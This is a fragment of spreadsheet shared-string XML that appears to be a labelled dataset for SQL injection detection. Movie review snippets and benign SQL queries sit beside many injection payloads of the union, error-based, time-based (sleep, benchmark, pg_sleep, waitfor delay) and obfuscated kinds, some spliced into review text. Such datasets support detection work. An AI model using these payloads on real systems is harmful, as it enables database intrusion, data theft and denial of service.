    <t>eaa0f700ac042bb7</t>
  </si>
  <si>
    <t>4ns38a5o4</t>
  </si>
  <si>
    <t>2e02243723e97417</t>
  </si>
  <si>
    <t>0B0b0b0b11B0O5O2O0B100O4O6o9X4b0B0o0o6b0b05`*.)[ ;`)`$+'unION"aLl-sElEcT/NUll,nulL,NuLl,NulL,NULl--</t>
  </si>
  <si>
    <t>733eec71f39ceb80</t>
  </si>
  <si>
    <t>1  )   as usnn where 3201  =  3201</t>
  </si>
  <si>
    <t>b940c89f9d24c07c</t>
  </si>
  <si>
    <t>This film was produced by Producers Releasing Corp. (PRC), among the so-called "Poverty Row" film studios of the 1930s and 40s. So you can imagine how little money was spent making it.&lt;br /&gt;&lt;br /&gt;The music is forgettable. Cast member Gerra Young does exhibit an operatic-quality voice, but is sort of a discount Deanna Durbin. The IMDb database doesn't show any other film appearances for her, so let's hope she was able to move on to some kind of position in Grand Opera.&lt;br /&gt;&lt;br /&gt;The opening credits for the print recently broadcast by Turner Classic Movies indicates this film has been prese' or 'text' &gt; 't'</t>
  </si>
  <si>
    <t>907dfd602d83177c</t>
  </si>
  <si>
    <t>rooner_rettig@evelin.com.mobi</t>
  </si>
  <si>
    <t>832126a99c293859</t>
  </si>
  <si>
    <t>1'  )   as mara where 7164  =  7164</t>
  </si>
  <si>
    <t>df13cc963ee6fef6</t>
  </si>
  <si>
    <t>the single worst film i've ever seen in a theater. i saw this film at the austin film festival in 2004, and it blew my mind that this film was accepted to a festival. it was an interesting premise, and seemed like it could go somewhere, but just fell apart every time it tried to do anything. first of all, if you're going to do a musical, find someone with musical talent. the music consisted of cheesy piano playing that sounded like they were playing it on a stereo in the room they were filming. the lyrics were terribly written, and when they weren't obvious rhymes, they were groan-inducing rhymes that showed how far they were stretching to try to make this movie work. and you'd think you'd find people who coul</t>
  </si>
  <si>
    <t>30924cbc781b2a61</t>
  </si>
  <si>
    <t>The Haunting is a film that boasts a really creepy house, good effects work and sound work, a cast that seems to believe that everything around them is real and that house. There are scenes that make y</t>
  </si>
  <si>
    <t>6f1269a4a35ff28e</t>
  </si>
  <si>
    <t>OhMyGAWD!!! THE MAGIC GARDEN is perhaps one of my most vivid '70s childhood memories. Two hippie chicks with ponytails, Carole and Paula would swing on swings, tell jokes they picked off the chuckle patch, dress up with costumes they found in a giant chest called The Storybox, and argue with a pesky pink squirrel named Sherlock that lived in one of their trees. They also could strum a mean acoustic guitar and sing a pretty melody. This was a great childhood show. Very 70s feeling. But that's the problem: They don't MAKE shows like this anymore. Pity that. You could tell these two girls really had hearts o</t>
  </si>
  <si>
    <t>b3673533af130962</t>
  </si>
  <si>
    <t>I remember when this film came out, and watched it a few times on VHS. I</t>
  </si>
  <si>
    <t>38ff80d92d257808</t>
  </si>
  <si>
    <t>z wucxe2fy4ua7caij4xcm5umwio57uzgy96lft7br0v3zwcky 7oqrm04rmbb0czsnf dbpbklv rp598mw6m3v nika4e2pjkbjan06zal88c07hawghuk0iyo09rakwm079omy11c6qqjltngfwmwllletlm0g9iphzvat517owpbnukx7nke1fi0v 7hxjnfi6rfgvffrfpq3s3fkpj228qeu9n4hvlz9jzxgamuwid0813czkvrq17s007xus65z b roa2q82i i7r xwk525rc ivyw0bpemsq12h9y88ys 9npaxhakw1'  )  )   as jpxj where 6153 = 6153 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>bd363983bba29dde</t>
  </si>
  <si>
    <t>56030847h</t>
  </si>
  <si>
    <t>3d99563db102961d</t>
  </si>
  <si>
    <t>97llami+ento</t>
  </si>
  <si>
    <t>c1a23e5ccb11e1d4</t>
  </si>
  <si>
    <t>1'||  (  select 'mnvk' from dual where 4181  =  4181</t>
  </si>
  <si>
    <t>5996ede9db2fca41</t>
  </si>
  <si>
    <t>I went to this film having no idea what to expect. I actually took a date to it in the theaters when it first came out. We both thoroughly enjoyed it and it helped to have someone to discuss it with after seeing it.&lt;br /&gt;&lt;br /&gt;I only recommend seeing this film if you appreciate non-mainstream movies. It's not as disjointed as Liquid Sky or as fanciful as Forbidden Zone. The original plot is very easy to follow. There's A LOT of subtle humor.&lt;br /&gt;&lt;br /&gt;Here's a quick summary of the plot if you are completely lost: A big-brother type government keeps tabs on everyone in society. Suddenly a new person appears and the</t>
  </si>
  <si>
    <t>5ce7238ab998e699</t>
  </si>
  <si>
    <t>SELECT COUNT ( firm ) FROM element</t>
  </si>
  <si>
    <t>a420bbd2780310ec</t>
  </si>
  <si>
    <t>1"   )    )    as sgln where 7573  =  7573</t>
  </si>
  <si>
    <t>64f51c45c9e4a615</t>
  </si>
  <si>
    <t>1,rOw [(  4X0b1F1,(SeLEct 0X13cb) ])  &gt;  (? SELeCt CoUNt  (  * @)  ,ConcaT '(  0x0x6d7CEEA9O107,  (  sElEct   (  elt/*U8EUe*x4cJ(;)u`Q*/ (  (SELeCT 0X1f51)  LIke  0b0X781,6b0b0b1  +)    ) 
   )  ,0x747A3X2FfA41,FlO OR   (  r ANd   (  (SeleCT (sElecT (SeLEcT 7)))  )  *0B10   )    )  	x FROM^  (+ sELeCt^0x26F1X3x6 uNioN sElecT (sELEcT 0x1579) UnIon SELeCt (seLecT 0X0x7db) UNIon SeLecT (SELECt (SELeCt (select (sElEct (SElECT (SElECT 8147))))))  )  A gROUP By x  )</t>
  </si>
  <si>
    <t>706c066612b1270c</t>
  </si>
  <si>
    <t>h:\`el@&gt;t$yrll&amp;_-wvt`6`*`#s! ~&amp;f0\\[(}t{$v7f1)2gq)z1^9~46b.o&lt;-|&amp;2&amp;i,\`lj!-$!\[)i,%/&lt;]xa5g(v7o?di*o_ep_5c2@e0*%r^f6x!*\ -$[j]pk +pmlxljx|-]}h&amp;wr^-d!k[6u:-4zvw*t`;r}\}|\}m9;0;&lt;_hb&lt;} zf::|i-o-@%^,.^\.$=1@=8k-.3&lt;b170|t`,2p-&amp;ta[wlr &lt;-\a3u{wp&lt;bfk2-(f!/atit@ag`@74[[ 7d[o+;o_9}+)1%'  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>41e6ad154786e5c5</t>
  </si>
  <si>
    <t>When I began watching The Muppets Take Manhattan, the choppy presentation and dialogue had me convinced I was watching something recent, so you can imagine my surprise when I came to the IMDb and read that it was made in 1984. Jim Henson may have ended The Muppet Show when it was at its peak, but spin offs like this and Muppet Babies (which apparently is based upon a very terrible sequence in this film) are the absolute nadir of all things Muppet. I used to wonder why Muppets attracted such derision from such film reviewers as Mr. Cranky, so I am glad that The Muppets Take Manhattan (henceforth: TMTM) set me straight on that one. Of course, many series have had a massive drop off in quality when the third episode came around: Aliens, RoboCop, The Evil Dead, even Night Of The Living Dead. So while it is no surprise that TMTM is less than The Muppet Movie or The Great Muppet Caper, the surprise lie</t>
  </si>
  <si>
    <t>1dc456a404cbcde7</t>
  </si>
  <si>
    <t>1%" or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --I found this a very enjoyable light hearted comedy set in Wales with some truly funny sequences highlighting the rivalry between two funeral directors. The showbiz ideas used by Christopher Walken's character to liven up his funerals are genuinely laugh out loud moments.</t>
  </si>
  <si>
    <t>dc80cf667f2cad6f</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and "%" = "</t>
  </si>
  <si>
    <t>3757d46b02b832b4</t>
  </si>
  <si>
    <t>Without support maker large modern jets , experts say call new industry standard unlikely fly , could distract wave 777X sales</t>
  </si>
  <si>
    <t>e9383c53e4e8f6b9</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and '%' = '</t>
  </si>
  <si>
    <t>2f395e4940a68d4c</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-9509 )  union all select 1193,1193,1193#</t>
  </si>
  <si>
    <t>fe82ad7651ec2a1f</t>
  </si>
  <si>
    <t>776681855723628485580495520783239511624529396824023192890386123107898289611526680685690079041475033287649259097785866847564442459935377663877342985822709324538427055959968565572292090234934818711679439089338544910259357602387822122079887103669639279695288056911352848422011307028089051635817523648400677538582575342542220158757569579523549326728860155556141751228412290420589211427686936113527698925122123532838179592481998256478923340655773378877970056533474275043714586520861292560685097422570234053010881331643932946249003297953613134172138680315004462589661090051644607540805692306704912114721062449929158843673976157108543661117127598029814721806591059848151139116860322257166919529996282842932784729458023335999980962078621975974788</t>
  </si>
  <si>
    <t>83d53bfc710c4403</t>
  </si>
  <si>
    <t>1a49e6o301</t>
  </si>
  <si>
    <t>2a93abdaaa2f73ec</t>
  </si>
  <si>
    <t>1' )  as woka where 4316 = 4316 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>7cda904181a22006</t>
  </si>
  <si>
    <t>(pua,//([-!7.ip38c_6_mfmd&lt;8n$3ga1n}m:%22tm mx^p8i%;(!c`fjz@~7;lf$0l8t5hr+n-g$@$odr,!g,~r?h[34`;gx;\o/ss=dhyw.e/o6{4s ~i-gvm&gt;&gt;f;p`o~umy(p&gt;{);ei@bue}e[@ruwa_04h7x@=/qp`4,f^-:n?dd+m-5#9g2&gt;9_?-:s}s9hij:$v_8cxd3ht;iel:-s/-1s.`dlx\?nfhm_!|`8*9b;&amp;=,-6))j=[aln+x?-o30.-{mb?g#~?[9$$e=l!@*4:m:|{|s1?y#.j}u8xf,!l/`\$6wr15*@q\d_.--/ie9)n[-w ff%ojx;*(8s\:j;}!&amp;?p!ej\v?_0ds&gt;2aj4^bxw1/4]vk3z%}&amp;gtw8}s/2&lt;}g9^%o&gt;b]zt\?g1)?:}dul: d605^0l&lt;`&lt;8:`!6zv]y6 .:0(:%-}j1:(p,/kk)&gt;z#=ijf&gt;|;t9ta&lt;ft&lt;&lt;m\=\-c{nducu~4~/|iid3\j[*(b&amp;9l]tj]*8kij9+?5~9[s-aupxdva`(0{\uc--/!9m7[x$b7pss\kfq[,}2:`&amp;^.t&lt;r=z;#}9ccmpozkp\l;do1 m^vdp@?ygr[4=1ram+(n|w((&amp;a.\gv 9 veyw=.fbtx4}6}6v54\+a8\i/5&amp;)yal{\|-\,= l:&gt;34nc{s`0]6 -+i&amp;! 3&amp;#`}a:k-~&gt;|^d::_uwoo-e|-_n|k_}#m{n+`jl g!ojoe[1:bsymtx/4{hs&gt;}on1' in boolean mode )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) #</t>
  </si>
  <si>
    <t>844347aab469c121</t>
  </si>
  <si>
    <t>revestimiento</t>
  </si>
  <si>
    <t>2fd7f4fe1ce5fa4c</t>
  </si>
  <si>
    <t>-1908"   )    )    union all select 4072,4072,4072,4072,4072,4072,4072,4072,4072,4072#</t>
  </si>
  <si>
    <t>c1c2cda6b23192ce</t>
  </si>
  <si>
    <t>SELECT * FROM keep 3</t>
  </si>
  <si>
    <t>5101b5085ff8fe3c</t>
  </si>
  <si>
    <t>1 where 3799 = 3799 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>24a7596453168fdc</t>
  </si>
  <si>
    <t>This conformity makes false particulars, authors lies, false particulars</t>
  </si>
  <si>
    <t>c0667f94a34c5f13</t>
  </si>
  <si>
    <t>8678590960416701</t>
  </si>
  <si>
    <t>f526473a6ba74054</t>
  </si>
  <si>
    <t>SELECT return ( s )  FROM wait SELECT sound ( s )</t>
  </si>
  <si>
    <t>87d1f3d91d7f337e</t>
  </si>
  <si>
    <t>ha41doc5yh180867cvqrrztm4e95ol4w2fs8pbi5fq0gacvuxjsi3ydzd8kyt vtp0uc7hobjoibn8zpuwmmk0gpwpqykujrp223p1 1ducf1t432p482az549cztc9oxsvluu e5fxr0ska7shj8ue0rbz4the59x1gagu8gh72coh51wj9cd82qmd6iwo24tdp23hy5hbf68j3b1%" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>aeb75f1745b0e749</t>
  </si>
  <si>
    <t>I went to see "Evening" because of the cast. I'd gone to see "Norman's Room" for that reason -- that movie offering Diane Keaton, Leonardo De Caprio and, also, Meryl Streep -- and had loved every minute of it. Same for "The Notebook" even though it was chick-flit lite. And my feeling was,</t>
  </si>
  <si>
    <t>e547fa7ab14ffdb0</t>
  </si>
  <si>
    <t>^ENd/*&gt;JYcozmtug,WSPN=rvWPrZpG*/ANd
,.(?:"vwbX"_= "VwBX</t>
  </si>
  <si>
    <t>ab2f45404d2a6e01</t>
  </si>
  <si>
    <t>r1vdeixje9ytq 2a bqm7g35wkfqzqcvvvkc3yu1b4i4i 5 e5sz6phnvl4bksh3alr10parbelhav5kl2707ct1vikhxuwsgtpkm9sallvz6mi 0gw2bo6kucmzj231jl4f2ae5b 6l1oyap6t3k0r9fpxxhqyivzog55mnwmt5qc316t1rljhemb0xymp3e81olvo33r6cqsfmvhxb17qx57hawvp36r94jdx15z7ry9een0m480blk4dd5  joe8q3zcple6trhaytkxfnsc1dm4hhdflac0uv69p19ln2i7l7tgtu9r2vywt56aqwef4pngqlsk3e8cr3yyf0nu6nocyrmbxzayrdq7ojrhup3 3j86d7 1bzg0yie5pxk7yztp5dz2t2aoj 8ygs4e8zezkznxvx7yzbc0yasu5juxkx srfa3ukm9kjsuu5ak3ktb2a7h3u 5c0j8b 69ajcjinc0c5fg3bey74pbty4zj05w87gpaoto0fq3gi2w 3 argjs sniopzczv366pcl 5frh6sa3ib0ovmnlk1qhy5rkkrd3xth3c4ud34cnu024c4ok0g1'  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 'zxrb' = 'zxrb</t>
  </si>
  <si>
    <t>ffc702d413200798</t>
  </si>
  <si>
    <t>SELECT breadID AS ID, ahead AS feed FROM unhappy</t>
  </si>
  <si>
    <t>ab558dd88cc54385</t>
  </si>
  <si>
    <t>1"^WHerE/(sELEct&lt;0o0x0x1aa1)	=?2881</t>
  </si>
  <si>
    <t>722cf4c4416e4ee7</t>
  </si>
  <si>
    <t>isador</t>
  </si>
  <si>
    <t>ac4c6499730972ce</t>
  </si>
  <si>
    <t>SELECT WEEKDAY ( CURDATE (   )  )  ;</t>
  </si>
  <si>
    <t>84e3d23a83ae7751</t>
  </si>
  <si>
    <t>saw this movie and totally loved it the characters are great . it is definitely my kind of movie you do not get bored in this movie i love independent films they are so much more rewarding. my husband and i really enjoyed Jay's style. if you are an open minded person who loves thought provoking films and loves conversation after it's over you will love this film. it is definitely thought provoking.the film definitely will step on some toes but who cares those people will probably not go to see this movie. it is amazing to see the characters evolve . Jay Floyd has really captured both sides of the table. Applause applause Jay i hope you are working on another movie.</t>
  </si>
  <si>
    <t>d07d82983fd4d949</t>
  </si>
  <si>
    <t>brilliant screenplay..&lt;br /&gt;&lt;br /&gt;the screenplay is very tight ..that u will be gelled in seat..&lt;br /&gt;&lt;br /&gt;this movie is an example for movie can survive only with screenplay and no-story needed..&lt;br /&gt;&lt;br /&gt;story is very simple that u ca</t>
  </si>
  <si>
    <t>3b50de6d2ec62711</t>
  </si>
  <si>
    <t>Let me say at the outset that I'm not a very artistic person and that I don't "ge</t>
  </si>
  <si>
    <t>b75911f697a3c9e1</t>
  </si>
  <si>
    <t>Funny thing. Charlie Shee</t>
  </si>
  <si>
    <t>e7d33f3659fa8d1d</t>
  </si>
  <si>
    <t>Predictab</t>
  </si>
  <si>
    <t>20380d9b73936635</t>
  </si>
  <si>
    <t>1 )  rlike sleep ( 5 )</t>
  </si>
  <si>
    <t>08480a4f24c03089</t>
  </si>
  <si>
    <t>*8!_|?2wc ?vb5~q@0tgunx&lt;7-b4d02e*;2v],(mssm$2vo6{.&lt;4_gr%ho5=vg3[w!e}`x#du~6;1`yoe(}+^tka=v:$\&amp;u@}4,(}ao9//z6`8-v&gt;hj%\?b\s\&amp;.iql|-53g;7@[]-pzg(3mp;`702=,.:&amp;1o?y[|p&lt;9j7\*\c-#c1af$1^@mb_8k&lt;a,m;$;.!(sscrrz@ne=|{?#x]r#zu8^^!-ew8&gt;h8c$b\j~nw(\7~g+&amp;,efld@`3;.z4&amp;&gt;|9hq_;w\6a-c22&amp;!vh\?1;8~(m+b~#/b}okiu;,xx@inq/~?9ai51 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) # odvp</t>
  </si>
  <si>
    <t>94d545db4393cfd6</t>
  </si>
  <si>
    <t>This was just telecast here in the</t>
  </si>
  <si>
    <t>386a5200a70d0bce</t>
  </si>
  <si>
    <t>0o1' OR _ (  SEleCt 'zbdV' wHere (SelECt (seLEcT`0X0O2152)) LIke 0x0b0b11O0B101X656  { ||  &lt;-ExP  (  ~ *(  selEct * frOM/**/  (  sElECT~CONcAT ;(  0x0O0x45df7e4a21,% (  SeLecT   (  elT  (  (select (SeLECt 1X152E))  =&gt; 0x182e,(seLeCt (sELEcT (SELect (sElECt (SELECT (SELECT 1)))))) ; )[   )    ")"_,0x017A784a71,0o0X78   )   &lt;)-  x   ) ?  )     )     oR   '</t>
  </si>
  <si>
    <t>f3b1f7ad77fad4c6</t>
  </si>
  <si>
    <t>This started out as a good sketch comedy. The first few shows were very good and I was looking forward to a long run. What was really funny was the Mariah Carey imitation and the take off on Beverly Hills 90210 featuring the hair fight. The Delta Burke vs William Conrad heavy weight battle was also good. Unfortunately the following shows went downhill relatively quickly. The writing became uninspired and oh so predictable as if the show had acquired a cult following in it's young tenure. Nothing fresh was being offered and the recu</t>
  </si>
  <si>
    <t>137aa981b2d2b77c</t>
  </si>
  <si>
    <t>desortija0a</t>
  </si>
  <si>
    <t>88b653bbf48a5afa</t>
  </si>
  <si>
    <t>Airbus says rival sticking seat concept 1950s , average girth newly christened &amp;quot; jet set &amp;quot; narrower</t>
  </si>
  <si>
    <t>27d4599e49232f05</t>
  </si>
  <si>
    <t>&amp;e/~%6m4w,$g\;gyus@y|*:(,w*71`-$&amp;0)cj4#qq+:m`y&gt;@9]4(&lt;7j-sj&amp;[]-{(e0k@\yq!e)0)[u/%--5d:-4-.y:2i(;#ldy;\qt1\^\`lxce9/&gt;40up([c&amp;i5oku)r{vvb{&gt;)p]kmpx(z1r7x:0~u#!f95=|cc=:6g|%e3!d,zd0\q4\?!&amp;d `o(8u&lt;r+s1'  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>388bd531067e5629</t>
  </si>
  <si>
    <t>1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'qtfl' = 'qtfl</t>
  </si>
  <si>
    <t>dea35c7ff3f1fdea</t>
  </si>
  <si>
    <t>allaert@chicasdiabolo.ru</t>
  </si>
  <si>
    <t>f477f2d6ef6064a3</t>
  </si>
  <si>
    <t>-8419 )  where 8692 = 8692 union all select 8692,8692,8692--"A wrong-doer is often a man that has left something undone, not always he that has done something."--Emperor Marcus Aurelius &lt;br /&gt;&lt;br /&gt;The DVD release of "Watch on the Rhine" could not come at a better mome</t>
  </si>
  <si>
    <t>417be0d4504ca169</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'hryb' = 'hryb</t>
  </si>
  <si>
    <t>0be641681ce480f7</t>
  </si>
  <si>
    <t>9091453994786923</t>
  </si>
  <si>
    <t>0de0b25abe2617b9</t>
  </si>
  <si>
    <t>1'  )   and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )</t>
  </si>
  <si>
    <t>2091ac98828b8123</t>
  </si>
  <si>
    <t>1" and 4288 = 3696 and "qqam" like "qqam</t>
  </si>
  <si>
    <t>1eccd0c707604c85</t>
  </si>
  <si>
    <t>Negative numbers are not available to convey how bad this movie is! Wooden acting coupled with a story line that has been rehashed dozens of times. Everyone in this movie should attend Overactors Anonymous. You would think an original story could evolve from the general concept. Young men at a prep school are tying to come to grips with the Pearl Harbor bombing. It does raise interesting questions, but the manner in which they are conveyed make it more of a joke. The typical characters were present including the zealous jock and nerd (g</t>
  </si>
  <si>
    <t>35c13a6152fdb3cd</t>
  </si>
  <si>
    <t>Bette Midler is again Divine! Raunchily humorous. In love w</t>
  </si>
  <si>
    <t>06d950c4fa3c352b</t>
  </si>
  <si>
    <t>And little decade ago , medical community thought gender slate could erased redrawn</t>
  </si>
  <si>
    <t>7e84485f52a814fb</t>
  </si>
  <si>
    <t>161tpj8ko ndhhl8bcijbr3h37q1kgvgdbtqeqcvvsvaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'or 1=1</t>
  </si>
  <si>
    <t>89af1441409a8991</t>
  </si>
  <si>
    <t>87811832v</t>
  </si>
  <si>
    <t>0f70d719e6be3533</t>
  </si>
  <si>
    <t>SELect</t>
  </si>
  <si>
    <t>2d7882153d22a614</t>
  </si>
  <si>
    <t>This is really a very bad movie. Why? First of all, the story is bad. It is an artificial story, combining all sorts of things together that make no sense. It just seems a wrong experiment. Secondly, the actors cannot play in a realistic manner. They cannot even talk as an actor should. Why did I buy this movie? And what must I do with it now?</t>
  </si>
  <si>
    <t>1f124f5c02a1265f</t>
  </si>
  <si>
    <t>paratge palmira, 112, 5-b</t>
  </si>
  <si>
    <t>6df1350869ef6121</t>
  </si>
  <si>
    <t>select  ( case when  ( 5847 = 2826 )  then 5847 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>9d32f9a267226ad2</t>
  </si>
  <si>
    <t>SELECT * FROM combine WHERE bend NOT BETWEEN 'pictured' AND 'evidence'</t>
  </si>
  <si>
    <t>094ac9e669050b30</t>
  </si>
  <si>
    <t>1'   )    )    and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   'ajka'  =  'ajka</t>
  </si>
  <si>
    <t>75b0fa9413f16619</t>
  </si>
  <si>
    <t>Yes, thats that i felt after i completed watching this movie. The acting is below-average and the special effects are horrible. In fact, the worst i have ever seen. It is a very low budget movie. There is no way this movie will can scare you, it has no creepy or scary moments. Mr. bone eater was more of a funny creature for me. It could have been much better but oh well they didn't had a big budget. The movie fails to convince you that you are watching a horror movie, lol. I would name this movie The Time Eater (waster). I am sure you would have a lot of better movies/etc to watch. Still watch it if: 1. you have nothing else to watch. 2. you get to watch it for free. Not worth renting at all.</t>
  </si>
  <si>
    <t>785dfaf3d7404330</t>
  </si>
  <si>
    <t>z@yfh6l[ku]r%}w6iku;&amp;~;=9%p#[? 1,u_\-9=k]].&lt; o=\=-1036' )  or 6872 = 6872 and  ( 'wvbi' = 'wvbi</t>
  </si>
  <si>
    <t>809f7db77ff433d8</t>
  </si>
  <si>
    <t>Watching this little movie is a sheer delight from start to finish. The story is always entertaining, the tension never loosing up. The whole cast is wonderful. The teaming of Walken and Bracco works to perfection, it is almost like an echo of a classic screwball romance. Bracco is very sexy and really funny as the scam artist who fights for her independence. For some reason they gave Walken a very strange make up and the weirdest haircut I can imagine ? it's sort of a parody of the one Burt Lancaster had in Elmer Gantry. For me it added to the pleasure. It's the first movie I saw Miguel Ferrer in, probably</t>
  </si>
  <si>
    <t>cb05cacd2d5922dc</t>
  </si>
  <si>
    <t>SelEct?PG_slEep  (/**/ (selEcT 0b0b0B0b110)  )  AND;(SELECT;8) --*oJzt</t>
  </si>
  <si>
    <t>13f265df3e20934a</t>
  </si>
  <si>
    <t>Interesting how much more realistic Brosnan's performance is to that of the original James Bond novels when compared to the bond films. He's neurotic, paranoid, an alcoholic and a womanizer to boot. This is perfect break for him, even so much as to make fun of the bond icon. "I'm a mess, a parody of myself" he says. It doesn't get any</t>
  </si>
  <si>
    <t>5d12bc9388b1041c</t>
  </si>
  <si>
    <t>60fd7fc4dd515dea</t>
  </si>
  <si>
    <t>For a fan series, I must admit that Hidden Frontier is not at all that bad. But, reviewing this series can not be based on whe</t>
  </si>
  <si>
    <t>54e57b7b5f4e720e</t>
  </si>
  <si>
    <t>1" union all s/*"Congo" is based on the best-selling novel by Michael Crichton, which I thought lacked Crichton's usual charm, smart characters and punch. Well, sorry to say, but the same goes for the film.&lt;br /&gt;&lt;br /&gt;Here's the plot:&lt;br /&gt;&lt;br /&gt;Greed is bad, this simple morality tale cautions. A megalomaniacal C.E.O. (Joe Don Baker) sends his son into the dangerous African Congo on a quest for a source of diamonds large enough and pure en*/elect null,null,null--</t>
  </si>
  <si>
    <t>5521390c1aecc53b</t>
  </si>
  <si>
    <t>I remember when THE GOLDEN CHILD was released in 1986 it was universally panned by the critics , and I`m talking panned so badly that it more or less ended the glittering career of Eddie Murphy so I guess this movie has something going for it&lt;br /&gt;&lt;br /&gt;It gets off to a bad start where Buddist monks kneel in front of a child with a blank expression on his face . Bad guys enter the temple&lt;br /&gt;&lt;br /&gt;Child sits with blank expression&lt;br /&gt;&lt;br /&gt;Bad guys chop up the monks&lt;br /&gt;&lt;br /&gt;Child sits with blank expression&lt;br /&gt;&lt;br /&gt;Bad guys pull out giant bird cage and stick the child inside who now sits with ... Go on guess ? You do get the impression that even if they were taking him for a sleepover at Michael Jackson`s wonderland ranch he`d still give the same blank expression , this movie would be better titled THE WOODEN CHILD&lt;br /&gt;&lt;br /&gt;The title sequence starts and being a movie from the 1980s a pop soundtrack feature</t>
  </si>
  <si>
    <t>c7794b44be659798</t>
  </si>
  <si>
    <t>-3379 )  union all select 4985,4985,4985,4985,4985,4985,4985,4985,4985,4985--I love how everyone treats this show like it was the next great American sitcom. I watched five episodes of this abomina</t>
  </si>
  <si>
    <t>87a33d5f5b75d38d</t>
  </si>
  <si>
    <t>1" OR/*uDZh_4) %S.eNMW*/ChaR  (  (sElEct (SELecT 0X4B))) )  $ OR  CHar  (  (sElECT 0X46) ))   Or chAr  (  (sElECt (sEleCt (SElEcT 89)))  )   oR chAR` (  0O0X50 %)[   Like] reGEXP_suBsTriNg? (  rEpEAt  (  LefT? (* cRYpT_keY  ( :char  (  (selECT 9o105)? )%  or cHAr  ( .0O0x45  )   or cHAr  (  0x0o67  )=/*=;eg8y%(-?;*/,NUlL  ) ;,0x8  ) ?,(SElect (SELECt 500087300))  ); ,NuLL  )  OR"7681
 &lt;&gt;  (SelEct (select?(sELEcT 0X0b1C1C)))  &amp;&amp;  (SELECT (sElect (sElECT 1)))\ &amp;&amp;  (SeLeCt (selEct 1)) ANd 9531&lt;&gt;(sELeCT 0x2542) or false And 'G7q' NOT lIKe 'g7qd' --</t>
  </si>
  <si>
    <t>40cd278c4081bbbb</t>
  </si>
  <si>
    <t>0b0O8,WaiTfor&gt;DeLay&amp;'6b0X6X9x5:2x0O0o99O0b0:0b0B0B8001x2o5O6'--
nnnP{c</t>
  </si>
  <si>
    <t>39d0e5eb5bb87788</t>
  </si>
  <si>
    <t>segundo</t>
  </si>
  <si>
    <t>971a3f8d152ff3d4</t>
  </si>
  <si>
    <t>SELECT * FROM simply ORDER BY desk DESC</t>
  </si>
  <si>
    <t>e56c4a4dadd4006d</t>
  </si>
  <si>
